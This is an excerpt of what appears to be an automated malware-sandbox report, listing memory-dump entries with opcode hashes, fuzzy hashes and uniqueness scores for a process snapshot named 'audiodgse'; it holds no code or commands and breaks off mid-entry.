                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c090b851029eba6f26f5030e379119cb4bbd27b08ce436877530f2aaeae1b65f
                                                                                • Instruction ID: e343787e35a58043b70dbf49cecd413b447e528b8bbd2e974bbbd5d1be489c8f
                                                                                • Opcode Fuzzy Hash: c090b851029eba6f26f5030e379119cb4bbd27b08ce436877530f2aaeae1b65f
                                                                                • Instruction Fuzzy Hash: 59318271625302CFE720CF19C840B2ABBE9FF98B10F054A6EEA8597391D770E944CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                • Instruction ID: db6014e29a88cee62e47cfbee8eec90e117b5ef1de621431b12631bd009a86e1
                                                                                • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                • Instruction Fuzzy Hash: 05310E72B10702AFDB65CF6DDD42B9BBBF8AB08750F14492DA65AC3651E670E900CB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e1a0bb05d90681f4e19e3fbfc8f0f94784d6cde0ff82321dad688f86f46ac5f9
                                                                                • Instruction ID: d8f75b207ae0e29ad7f7bebb67681b3b33bd5f8e265a2621e06222b61b5e9b5e
                                                                                • Opcode Fuzzy Hash: e1a0bb05d90681f4e19e3fbfc8f0f94784d6cde0ff82321dad688f86f46ac5f9
                                                                                • Instruction Fuzzy Hash: FD31ACB1605301CFCB16DF19C55096ABBF6FF89B18F4449AEE8889B391D332D944CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f8006629e2a469fda7c853fd209e57317ba46632a776dc50886da69b1b9eefa1
                                                                                • Instruction ID: dcf45409d0b6a43a8d84670b716a985af8834c38edc8717cd8bd2c0a20e6ecee
                                                                                • Opcode Fuzzy Hash: f8006629e2a469fda7c853fd209e57317ba46632a776dc50886da69b1b9eefa1
                                                                                • Instruction Fuzzy Hash: FB31D171B212869FD720FFB8C881B6EBBF9EB90704F10852AD205D3295D730D945CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                • Instruction ID: 5e5fcae004c9e063382e370481d00d90c141be6ae43c6338c596b721d9ffbe4c
                                                                                • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                • Instruction Fuzzy Hash: 8521D536E6125BAADB11DBB98881BFFBBB9AF54790F0580359E55E7340F270D90087A0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 554778d74acc7c64cfa30d4bac13f55e74b2454a06109a9b741f20a58a6bb425
                                                                                • Instruction ID: 42fc147d940319cec37b67680d63445f4add827d85585b16978a48d9dc456c44
                                                                                • Opcode Fuzzy Hash: 554778d74acc7c64cfa30d4bac13f55e74b2454a06109a9b741f20a58a6bb425
                                                                                • Instruction Fuzzy Hash: 34315BB15203068BD725AF68CCC1BF977B8EF40358F5481A9DE859B382DA74D982CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                • Instruction ID: 946009d91ecccc24be70523d65b734cbd26fa9449ad70a51e337faf09f36f14c
                                                                                • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                • Instruction Fuzzy Hash: 2521423A68065277CF1AABA98C00FBBFBB5EF40714F40941EFA5597651EA34D950C360
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 92198370fe6252ff3180f86fe26038960becbca9064856ab9abd25aa64cd795d
                                                                                • Instruction ID: 55845267cc7ade252fb6cf8478d691359a7d043dd5360067852294a5cb74f8fd
                                                                                • Opcode Fuzzy Hash: 92198370fe6252ff3180f86fe26038960becbca9064856ab9abd25aa64cd795d
                                                                                • Instruction Fuzzy Hash: F531EA31A2011D9BDB31DF18DC81FEEFBB9EB15750F0200A5EA45A7190D6B49F808F91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                • Instruction ID: 4a411df64c6297434305f753bbefd06d05a8cf2e04a7e484ef36f62c6b11c9cf
                                                                                • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                • Instruction Fuzzy Hash: E22191B1A10649EFCF15DF5CCA80A9EBBB5FF48314F108169EF159B241D670EA06CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b98944d9fe3a8d9f40b6a977c98354ebef9b3bad21c34d3bbf28a0cf31ee2b42
                                                                                • Instruction ID: b878d1a730951cbdfc86c3b4515b64fe50c523bb9b85058be9ddf29867375340
                                                                                • Opcode Fuzzy Hash: b98944d9fe3a8d9f40b6a977c98354ebef9b3bad21c34d3bbf28a0cf31ee2b42
                                                                                • Instruction Fuzzy Hash: B621B1726247869BCB22EF5CD940F6BB7E4FB98760F004519FA549B641D730E9018BA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                • Instruction ID: 1fd7c08fdec32717698b6318942e0fcbce1bd47e7867f4f60a51effb6276e600
                                                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                • Instruction Fuzzy Hash: 1F319A31620605EFD721CF68C9C4FAAB7B9FF45354F1149A9EA128B291E770EE01CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f4ad933dc7c4d23ecc88201912c9a0c909a1e2130a0686203996709769a95215
                                                                                • Instruction ID: ed43058aaf00f8891a08859766f820f63514f33d46e58e32ad2092ab13658ea7
                                                                                • Opcode Fuzzy Hash: f4ad933dc7c4d23ecc88201912c9a0c909a1e2130a0686203996709769a95215
                                                                                • Instruction Fuzzy Hash: 9D31AE75A20206DFCB14DF1CC8859AEBBB9FF84704B168459E9099B392E771EA50CFD0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cfeacab6fed82c346b6fb3369533aa187bfda7dce14d29ab8b3842d7dad8bee9
                                                                                • Instruction ID: c69fa6a346fd79486484d76c2bae0efaef7f3261f0f738a46b900793417d3890
                                                                                • Opcode Fuzzy Hash: cfeacab6fed82c346b6fb3369533aa187bfda7dce14d29ab8b3842d7dad8bee9
                                                                                • Instruction Fuzzy Hash: A2219171A1022A9BCF14DF59C881ABEB7F9FF48740F540069F941A7240D778AD42CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 20bf81dc35684a396db8545fb8d246b6acffa81a843b0ea5342b0f2af05ce5ba
                                                                                • Instruction ID: 4f83c30f63c38309770840927e8f2a76e55a285db1325a275611021e4d2d91bc
                                                                                • Opcode Fuzzy Hash: 20bf81dc35684a396db8545fb8d246b6acffa81a843b0ea5342b0f2af05ce5ba
                                                                                • Instruction Fuzzy Hash: 94219A71620646AFD715DB6CD884F6AB7E8FF48740F140069FA04DB6A0D774ED41CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 969946b9f16b3cfe42651706c1c568b58be49842da283810c960d92cf7972446
                                                                                • Instruction ID: b2691f28be490ae17bfb4b9a051023d4e3eb218bd2a115318abb4a2f674a2d85
                                                                                • Opcode Fuzzy Hash: 969946b9f16b3cfe42651706c1c568b58be49842da283810c960d92cf7972446
                                                                                • Instruction Fuzzy Hash: 2C21D372A243479BD711EF5AC848B6BBBDCAF90640F08045ABE80C7251D7B0D906C7A6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 59d9ca08fc45cf2e671a942c039bb7dd0277a4e67818ce496f8605e835bc5e3d
                                                                                • Instruction ID: 29cf9bd7e575b76c24f80e13e9d69cda7ef77173adb11a1908d1412ce140c8f9
                                                                                • Opcode Fuzzy Hash: 59d9ca08fc45cf2e671a942c039bb7dd0277a4e67818ce496f8605e835bc5e3d
                                                                                • Instruction Fuzzy Hash: 5D210B31736687DBEB22A76C8D04B253BD5BF41B74F180364FB209B6D2EBA8C841C251
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cc464180705ee78c188e53f1f37c1f4534e6ed457a23d4673bece45bb1767698
                                                                                • Instruction ID: bb264b4ca97c6684d19a981a3974521efa3a04707e2ff272075c5767e97d236a
                                                                                • Opcode Fuzzy Hash: cc464180705ee78c188e53f1f37c1f4534e6ed457a23d4673bece45bb1767698
                                                                                • Instruction Fuzzy Hash: C5216A752617429BCB25DF29C901B56B7F5AF48B04F14846CE509CBB61E371E842CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b947eeb0196d7d5a50d81541a66b10391b172e3cf5fa67aa7acbe6a40fd280e3
                                                                                • Instruction ID: 8e8b72a951f17dedf24b97d0b1395a52d3f1c25226e7885777154156aaed3cd4
                                                                                • Opcode Fuzzy Hash: b947eeb0196d7d5a50d81541a66b10391b172e3cf5fa67aa7acbe6a40fd280e3
                                                                                • Instruction Fuzzy Hash: C7113272395A12FFE3265659AC00F2BBA9DDFD4B65F110028B748DB2C8EB70DC008795
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 10236fc2c17cdf09dc69cd1cf53b54e5cfcbf4d679c32762d02b6f8d9600d9e5
                                                                                • Instruction ID: 3dbaec4f0aab1e98841bb7e6420597e0cab4fcad742b69c546b3528cff8b478c
                                                                                • Opcode Fuzzy Hash: 10236fc2c17cdf09dc69cd1cf53b54e5cfcbf4d679c32762d02b6f8d9600d9e5
                                                                                • Instruction Fuzzy Hash: 3D21E9B1E10349ABCB14DFAAD8859AEFBF9FF98B10F10012EE505A7244D7709941CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                • Instruction ID: 2f5b57b9e5961da765be427d70f49278f0599d87d99293705ea3d22f408dcd5f
                                                                                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                • Instruction Fuzzy Hash: F4216D72A1020AAFDF129F98CC40BAFFBB9EF58310F204829FA01A7251D774D9509B50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                • Instruction ID: 9c931573658841268e7a82db5dafa06f2151dcb55951a4dba964ad184ddbe7ce
                                                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                • Instruction Fuzzy Hash: E911E2B261061AAFDB229B48DC41FAABBBCEF80754F100429F7048B180D671ED44DB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b00b468c273f44ca602afc85303112ef79cc228287fb4012dc2ce7a6c6251e7e
                                                                                • Instruction ID: 82116b69ed6f4f4b5d32cb75a74c72cb98961ee3ed721f0e3259304b6102d3e5
                                                                                • Opcode Fuzzy Hash: b00b468c273f44ca602afc85303112ef79cc228287fb4012dc2ce7a6c6251e7e
                                                                                • Instruction Fuzzy Hash: EE11B27A7207169BDB16CF4DC480A26BBEDAF4AB50B18406DEF089F244D6B2D9818790
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41aa5e353b3c984446231a0c98b0c646825b93f83b3bff37fef4a52badd73d60
                                                                                • Instruction ID: 49254dd589594c6daf21b026cf82bb49696996d0e1757e70f7cfe241f31cd85a
                                                                                • Opcode Fuzzy Hash: 41aa5e353b3c984446231a0c98b0c646825b93f83b3bff37fef4a52badd73d60
                                                                                • Instruction Fuzzy Hash: 7E216F75A10206DFCB14CF58C581A6EBBF9FB88714F2441ADD205A7351D771AD46CBD0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 62f61558e70a0322dbd2d3d98c97e08422f4108a02b82946436f28cb57770c4f
                                                                                • Instruction ID: 4ecd384cf677fd50b5d3082c8ec2423c824c429f7bc14b94de44e6c97e77becf
                                                                                • Opcode Fuzzy Hash: 62f61558e70a0322dbd2d3d98c97e08422f4108a02b82946436f28cb57770c4f
                                                                                • Instruction Fuzzy Hash: 04219D75620A01EFDB24CF6CC881FAAB7F8FF44750F40882DE59AC7250EA71A840CB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 174e9d5c1e1b4aa74991fc2768124822d8d72ce0b98ad40adef5fbfc75627b8d
                                                                                • Instruction ID: dd4e37b171376730883cfdb9a3f2de2cefc8cf86e3e60893dfc3d424ddb20eb0
                                                                                • Opcode Fuzzy Hash: 174e9d5c1e1b4aa74991fc2768124822d8d72ce0b98ad40adef5fbfc75627b8d
                                                                                • Instruction Fuzzy Hash: 80119172260615FBD722DBA9C940F9AB7A8EF95B50F11403DF3059B251DA70E905C790
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6958c28ce043e2fa8a366a385022507f84fb3c0f9252d4b8187b6c21bdb43a4f
                                                                                • Instruction ID: 22173aca12d5616faa2fe9bbfd74a91403e07d69b34b1142358b221e36e8b38c
                                                                                • Opcode Fuzzy Hash: 6958c28ce043e2fa8a366a385022507f84fb3c0f9252d4b8187b6c21bdb43a4f
                                                                                • Instruction Fuzzy Hash: DF116B773201119FCF19DB28CD82A3B7267EFD5774B26462DDA22CB281E9708802C390
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e73b4fb52e524a58deb0fe1e2e4e1bcbcc1f24ec6a9f07386e9a02df26fc97f
                                                                                • Instruction ID: f89f89294edc758bfeb7a21e918b025e88aeda6600de7115c6d63e434e34bbd4
                                                                                • Opcode Fuzzy Hash: 3e73b4fb52e524a58deb0fe1e2e4e1bcbcc1f24ec6a9f07386e9a02df26fc97f
                                                                                • Instruction Fuzzy Hash: 12118CB6A21206DFCF29CF5DD580EAABBE8EB94650F064079DA059B315E674DD00CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                • Instruction ID: 0420277dc0c7e0ee03ab4dcfa5103e385457b8c7ba8b2f1a31c1d691500c3d64
                                                                                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                • Instruction Fuzzy Hash: 94110136A00929AFDB19DB58CC05B9EFBF5FF84214F058269E856A7340E631AE01CB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                • Instruction ID: 2524e40e27cb8e0c3144cba4c33305736146679d038c6b9aca9fa33513ef6ad2
                                                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                • Instruction Fuzzy Hash: BB110631620602EFEB21DF48C848B26BBE6EF51754F468428EA089B170DB70DC84CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6c18f7151c79f54e81eb32586c364b940a84f414d0b88df6bc7cc53d78c7281f
                                                                                • Instruction ID: b4afad7ce2590e4c1f59253b83e679d648a78aa3ea107bef4684844986a1d3e9
                                                                                • Opcode Fuzzy Hash: 6c18f7151c79f54e81eb32586c364b940a84f414d0b88df6bc7cc53d78c7281f
                                                                                • Instruction Fuzzy Hash: C401D67173664AAFE716A66ED885F377B9CFF40794F050069FB008B291EA64DC00C2B1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 11b238e33d8d843bc00aa3f8cb9d845f05fd7db854f6e0b865f4f3f4a80c7bd5
                                                                                • Instruction ID: ba5391375717c4450a5585864e5f34e49bfa2cccc4a26a8ec2c91bb1e75f84e9
                                                                                • Opcode Fuzzy Hash: 11b238e33d8d843bc00aa3f8cb9d845f05fd7db854f6e0b865f4f3f4a80c7bd5
                                                                                • Instruction Fuzzy Hash: D21106752606829FD72AEF59C880F167BACEB85B64F044119FA4487290C374E880CF60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9a8952f93cfb6a8257fc84ca41304e6269dd769aee033d2dca79f733bb1b98dd
                                                                                • Instruction ID: 781e2bd94786c828cadc7fbaece058397b1a589998003081dded9a05f62e3d21
                                                                                • Opcode Fuzzy Hash: 9a8952f93cfb6a8257fc84ca41304e6269dd769aee033d2dca79f733bb1b98dd
                                                                                • Instruction Fuzzy Hash: B911C2362006159FDB26DB69D840F67BBAAFFC4715F194429EA8287790DB30A806CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, Offset: 01230000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_1230000_audiodgse.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c7f04716080c2ac1d30c7cdf35792cd084027db53400ace902dfb20bd8cbf3e9
